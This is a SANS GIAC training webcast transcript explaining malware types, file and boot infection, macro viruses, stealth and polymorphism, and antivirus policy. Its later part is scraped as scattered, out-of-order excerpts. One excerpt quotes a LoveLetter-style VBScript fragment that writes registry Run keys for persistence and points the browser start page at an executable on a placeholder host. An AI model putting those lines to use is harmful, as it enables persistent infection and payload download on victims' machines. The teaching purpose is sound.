Thông tin tài liệu
1
Malicious Software - SANS GIAC LevelOne
© 2000, 2001
1
Malicious Software
(Malware)
SANS GIAC LevelOne
Security Essentials
My name is Fred Kerby. Today's webcast is entitled ”Malicious Software" - shown on the first slide.
It's a part of the SANS Security Essentials series.
Picture this - the trade press is all abuzz with warnings of a new killer virus, child of Chernobyl.
Recall that Chernobyl struck on April 26, 1999. In Korea alone, it affected as many as a million
computers, causing more than $250 million in damages. The boss has just come down with a
magazine article in hand and has told you to drop everything. You have three days to ensure the
organization is ready before “child of Chernobyl” day. Is this real or a hoax? What do you do to
find out? How do you meet the boss' demands to get anti-viral software installed and updated as
needed? Stay tuned for answers to these questions and more…
Of course this course isn’t going to solve all your problems if you suddenly get hit and have no plan
of action or procedures in place. So you are going to need to apply what you learn here.
2
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
2
Objectives
•Malicious code
• Virus and hoax information
• Virus types and methods
• Organizational AV policy
• Desktop anti-viral care and feeding
Our next slide (entitled "Objectives") shows what we will be discussing during this Level One briefing.
At the completion of this course, the student will be familiar with these core concepts of anti-viral
protection.
What is malicious software? How does it spread? What are some of the characteristics of viruses?
What is the difference between a virus and a hoax? Where can I go to get more information on them?
Does my organization have an anti-viral policy? What does it say? Is it up to date?
What is anti-viral software?
What is involved in the care and feeding of desktop anti-viral software?
3
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
3
Malicious Software (Malware)
•Viruses
•Worms
• Trojan horses
• Malicious applets
• Majority Microsoft-specific
Let's move to the next slide, “Malicious Software”
Malware is a generic term for a number of different types of malicious code - viruses, worms, Trojan horses and
malicious applets. First, we will define what these things are.
A virus is a piece of parasitic code (or program) written specifically to execute on behalf of the user without the
user's permission (or knowledge). It is parasitic in that it attaches itself to files (or boot sectors) and then
replicates, causing the spread to continue. Some viruses do little more than replicate and serve as a nuisance;
others can do serious damage such as affecting programs or degrading system performance (the virus payload).
Never assume that a virus is harmless and leave it intact. We will look at the various types of viruses in the slides
to follow.
A worm is a self-contained program (or set of programs), that is able to spread functional copies of itself to other
computer systems (usually via a network). Host-computer worms are entirely contained on their host computer.
Host-computer worms that delete from one host upon propagation to a new host are called rabbits - they ‘hop’
around a network. Some worms run in multiple parts on many hosts. These worms are called network worms.
A network worm with one coordinating segment and many client sub-segments is termed an octopus! Note:
malicious code is called a worm when it requires no specific action on the part of the user to enable infection and
propagation. It just spreads. If the code requires the user to open an email or load a screen saver or take some
other action, then it is called a virus.
Trojan horses are programs with an intended action that is not documented or revealed. Typically, Trojan
horses masquerade as some other harmless or trusted program. A well-known Trojan horse is Back Orifice.
Malicious applets are applets that attack the local system of a Web surfer and involve denial of service, invasion
of privacy, and annoyance. Malicious applets are distinguished from attack applets that exploit vulnerabilities in
the implementation of the Java security model.
It is interesting to note that of the 60,000 or so known viruses, worms etc., about 55,000 of them are Microsoft-
specific (Gene Spafford). Care is needed here because this statistic does not mean that systems such as Linux,
Unix or Mac are immune - there are just less examples found here. We usually think of infection via the network
and floppy disks, but CDROMs are notorious for hosting malware. Just think of the damage that could be done
with a music CD. How about infecting a Windows system just because auto-run is enabled?
4
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
4
Virus Types (1)
• File infectors / Program viruses
–Direct-action
– Memory resident
–Cluster or File system virus
• Potential to spread over networks
Go to the slide entitled “Virus Types (1)” and let's take a look at viruses. Viruses are identified by
the ways they infect computers. Usually, a virus falls into one of the following three categories:
program viruses, boot record infectors, or macro viruses.
For the next few slides we will focus on program viruses. A program virus gets activated when the
program is executed (or run). The virus is loaded into the computer memory and then proceeds to
wreak havoc. The results of the virus triggering may not be obvious immediately, as the virus may
have a built-in delay (an event-triggered virus). First signs of infection can include files being
saved with malformed or improper names.
Program viruses are usually attached to files such as COM or EXE files, but can infect any
executable or interpretable file - overlays, drivers, system files, or binary files. Examples also exist
of viruses that infect C source code such that the compiled executable is infected!
Direct-action file infectors find one or more selected programs to infect each time the infected
program is run. Resident viruses install to the system service area of RAM and infect new
programs when they are run. Cluster viruses infect program files indirectly by modifying file
system structures such as the file allocation table. These viruses are loaded by the OS before the
target program because the file system points to the virus first.
Program file viruses need to be executed to activate and spread. As well as being run locally, users
can run infected programs from servers, download and run infected files, or execute mail
attachments. These viruses therefore have the potential to spread from program to program on a
single host, and find their way to infect new programs on different hosts by being spread by network
users.
5
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
5
COM Program Infectors
Prepended virus Appended virusCOM program
START
END
COM
VIRUS
VIRUS
JUMP
COM
1
2
3
4
5
6
Our next slide is entitled “COM program infectors”.
Now we’ll take a look at how program files are actually infected.
COM file viruses attach themselves to their target in one of three ways - by prepending to the
beginning, by appending to the end, or by overwriting part of the file.
A prepending virus gains control when the first instruction of the infected COM file is executed.
The virus runs and then passes control to the original program. Because of this, users may not notice
anything different.
An appending virus writes an instruction to jump at the first instruction in the file. This jump will
take execution to the virus which later returns control to the COM program.
Overwriting viruses simply write their code to the beginning of the file. These viruses therefore
destroy the original program. More sophisticated overwriting viruses will make a copy of the
portion that they overwrite which can later be executed - all in an effort to remain covert.
6
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
6
EXE Program Infectors
Original EXE Program Infected EXE Program
Header
Load
Image
VCS VIP
SIZE+V
VIRUS START
CS IP
SIZE
START
START
CS IP
The next slide, “EXE program infectors”, shows how an infected executable is structured.
Executables consist of two parts - the header, and the load image. The header contains, among other
things, a pointer that points to the first instruction to be executed in the load image. The pointer
(CS:IP) consists of a pair of values - the code segment (CS), and instruction pointer (IP). A header
entry named SIZE stores the size of the load image.
When the executable is infected, these header entries are altered. CS:IP becomes VCS:VIP and now
points to the start of the appended viral code. SIZE increases to VSIZE and measures the size of the
infected load image. Running the infected program will cause a jump to the virus load image. When
completed, the viral code hands execution back to the original program.
7
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
7
Virus Types (2)
• Boot-record infectors
–Floppy boot record (FBR)
–Master boot record (MBR)
–DOS boot sector (DBS or PBR)
–No network spreading potential
•Multipartite
–Potential to spread over networks
Let’s go to the slide entitled “Virus Types (2)”. The next virus we'll review is the boot infector.
Every disk has a boot sector (regardless of whether or not it is actually bootable). When a computer
is powered up, it looks for boot information according to a list provided by the computer BIOS. If
any of the media in the drives specified in the BIOS list have a boot sector virus, the infection will
get transferred to the boot drive. Once the infection is complete, the virus will get loaded into
memory at startup. From there, the virus can be spread to every disk that is read after startup.
Results of the infection can range from nuisance (if at all) to destruction of boot information, to need
for a complete format of the hard disk.
Floppy disks contain a floppy boot record (FBR) which can harbor a virus. If a system is booted
from such a floppy the virus will load and infect the hard disk. Viruses on hard disks infect either
the master boot record (MBR) or the Partition boot record (PBR) (sometimes called the DOS boot
sector (DBS)). The MBR is the first place the BIOS looks when booting from a hard drive. If a
virus is present it can seize control of the hardware before the operating system even sees the light of
day! PBR’s are executed after the bootstrap program in the MBR passes on control to the active
partition. Operating system files that are present on a partition are loaded according to instructions
in the PBR. Like the MBR infection, if a virus is present it will be loaded before the operating
system.
Multipartite viruses are hybrids of boot infectors and program viruses. When executed as a
program, boot sectors become infected, and vice versa - if multipartite-infected media are booted,
program files get infected. Multipartite viruses provide a mechanism by which boot-sector viruses
can get around on networks (they travel as program files). Boot-sector viruses cannot on their own
infect across networks. This is because the network protocols do not support sector level operations.
8
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
8
Virus Types (3)
• Macro viruses
– Targets are data files (e.g. *.doc)
–Written in ‘macro languages’ (e.g.
Melissa macro virus)
–Visual Basic Editor
• High network spreading potential!
Our next slide is entitled “Virus Types (3)”. A macro virus is malicious code contained in a set of
instructions that are included within an application such as a word processor or spreadsheet. Unlike
program viruses, which target executables, macro viruses target data files. Once the macro
containing the infection is loaded onto your computer, it can infect other files (such as the normal.dot
template for Microsoft Word) or cause itself to be propagated to other users automatically. A typical
example is the Melissa macro. It caused a document containing the macro to be mailed
electronically to other email users.
The activated macro virus is limited only by the capabilities of the ‘macro language’ being used.
Microsoft macros, written in Visual Basic, can access all host application features (e.g. Word) and
many OS features (Windows). For example, in Word or Excel, try opening <Tools-Macro-Visual
Basic Editor>. This opens a Visual Basic session enabling complex macro design. Imagine the
potential damage from commands such as open, kill (delete), or rmdir!
Macro viruses can spread as email attachments. Users open an infected attachment, the virus reads
the address book and mails itself on. For this reason, macro viruses have a huge potential to spread
over networks.
9
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
9
Virus Protection Techniques 1
• Stealthing
–virus attempts to hide or ‘cloak’ itself
–hiding from anti-virus software
–read stealthing
–size stealthing
• Need to scan memory to detect
Let’s go to the slide entitled “Virus Protection Techniques (1)”. To avoid detection, or being picked
up during an anti-virus scan, sophisticated viruses employ techniques to cover their presence or
tracks. When active, the virus builds itself a “cloaking device”.
Stealthing is achieved in a number of ways. The virus, through being memory resident (or hooked
into system services), monitors system function calls. When a system call is made, it is intercepted
by the virus and the virus tells a lie back to the system. In this way the system is deceived.
Read stealthing involves monitoring attempts to read or write infected files (e.g. open, read, or
close). If an infected program file is opened and read, the virus might give back to the system
information from a backed-up copy of the original file - the infection is invisible! Another form of
read stealthing monitors direct access to disk sectors. Even if low level calls are made to read the
master boot record (e.g. BIOS Interrupt 13), the virus will interject.
Size stealthing viruses monitor calls to directory entries and other parts of the file system. If the
operating system were to inquire as to the size of an infected file, the call is intercepted and a lie is
told.
Stealthing prevents or hinders detection by examining disks. Anti-virus scanning software must
therefore resort to scanning the system portions of RAM to detect these viruses.
10
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
10
Virus Protection Techniques 2
• Polymorphism
–poly = many, morph = form
–encryption/decryption routines
–mutation engines
• Makes a scanner’s job a lot harder
Our next slide is “Virus Protection Techniques (2)”. Now let's look at another protection technique -
polymorphism. Polymorphism literally means many forms. A polymorphic virus therefore has
many and varying forms - very biological indeed. If a virus is continually changing the way it looks,
the job of the anti-virus scanner is made a lot more difficult.
Viral polymorphism is achieved by using a mechanism that varies the code used to decrypt, or
unsheath, the virus into its active state. The inactive virus is encrypted so that it cannot be easily
detected by scanning for common strings (in fact, the code of the virus body will look like random
data).
If the encryption and decryption routines did not change from virus to virus, then a scanner could
detect the virus by detecting the decryption code. Therefore, polymorphic viruses change their
decryption routines on the fly. These changes might be made by a mutation engine built into the
virus that is linked to a random number generator. Alternatively, some mechanism might exist to
vary the sequence of instructions, or insert redundant instructions into the mutating routine. The
decryption routines still perform their functions, but the way they look is different.
The common cold is a biological example of viral polymorphism - however, the cold virus varies in
both form and function.
[...]... be familiar with: • Malicious software • Virus and hoax information • Organizational AV policy • Desktop anti-viral principles, care and feeding Malicious Software – SANS GIAC LevelOne © 2000, 2001 31 The penultimate slide (entitled ”You should be familiar with:") shows what we discussed during this LevelOne briefing Now you now have answers to these questions: What is malicious software? How does it... that software is running Malicious Software – SANS GIAC LevelOne © 2000, 2001 27 Let’s go to the slide entitled “Installation” Once acquired, what's involved in getting the anti-viral protection loaded on your computer? Well, anti-viral products are easily installed by running a selfextracting program and using a setup wizard that allows a good degree of customization For example, at set-up time, the software. .. Determined by your AV policy • Updating – AV software needs to be told about new viruses Malicious Software – SANS GIAC LevelOne © 2000, 2001 28 Let's turn to the next slide – “Desktop Care and Feeding” Note that these topics are applicable to server environments, but for the moment we will focus on clients Configuration - what do we need to do to "tune” the software? We’ll look at some example screen... having a written document that describes what the organization is committed to protecting (desktops, servers, etc.), who is responsible for doing what (buying, installing, updating, cleaning up, reporting, etc.) and what standards must be met (performance criteria) 24 Anti-virus Software • Activity monitoring programs • Scanners • Integrity checkers • Remember “defense in depth” Malicious Software – SANS... Set regedit = CreateObject(“Wscript.Shell”) regedit.RegWrite “HKEY_LOCAL_MACHINE \Software\ Microsoft\Windows\ CurrentVersion\RunServices\Win32DLL”, dirwin&”\Win32DLL.vbs” regedit.RegWrite “HKCU \Software\ Microsoft\Internet Explorer\Main\Start Page”, “http://www.badpage/WIN-BUGSFIX.exe” regedit.RegWrite “HKEY_LOCAL_MACHINE \Software\ Microsoft\Windows\ CurrentVersion\Run\WIN-BUGSFIX.exe”, tempdir&”\WIN-BUGSFIX.exe”... days”), I knew folks who would buy a site license and distribute the software on floppy diskettes That may have been a viable option when the software fit on a single floppy, there weren't a lot of computers to protect, and the computers were not heavily networked For the most part none of these conditions are true today The two anti-viral software installation programs commonly used in the US Department... Policy or Practice • Need for guidance • How it gets implemented Malicious Software – SANS GIAC LevelOne © 2000, 2001 21 Let's go to the next slide – “Background” This is the first of three sections on Policy The other two (covered in upcoming slides) are Scope and Responsibilities There is some discussion as to whether we need a policy document or implementation guidance The difference is that the policy... risk vectors that you might need to address in your document Even if you don’t have these vectors now, you might have them in the not-too-distant future Be sure your policy will cover them as needed 22 Roles and Responsibilities • Acquisition/procurement • Installation and updating • How often to update • Logfile review • Reporting infections Malicious Software – SANS GIAC LevelOne © 2000, 2001 23 Now... within minutes and seconds Therefore, it is necessary to keep our anti-virus databases well fed with regular updates Do this manually, or use the automated ‘live-update’ features provided with software 28 Malicious Software – SANS GIAC LevelOne © 2000, 2001 29 The next slide shows a screen shot from Norton Antivirus Look at the configurable options Scanner settings control what happens when you initiate... records to protect against unknown viruses We can also select the buttons to display if prompted (Repair, Stop, Inoculate, and Continue) 29 Malicious Software – SANS GIAC LevelOne © 2000, 2001 30 The next slide shows the configuration options for McAfee’s VShield software Specifically, the options for the system scan filter are shown The Detection tab lets us define the events that trigger scanning and . software?
What is involved in the care and feeding of desktop anti-viral software?
3
Malicious Software – SANS GIAC LevelOne
© 2000, 2001
3
Malicious Software. 1
Malicious Software - SANS GIAC LevelOne
© 2000, 2001
1
Malicious Software
(Malware)
SANS GIAC LevelOne
Security
Ngày đăng: 24/01/2014, 09:20
Xem thêm: Tài liệu Malicious Software (Malware) doc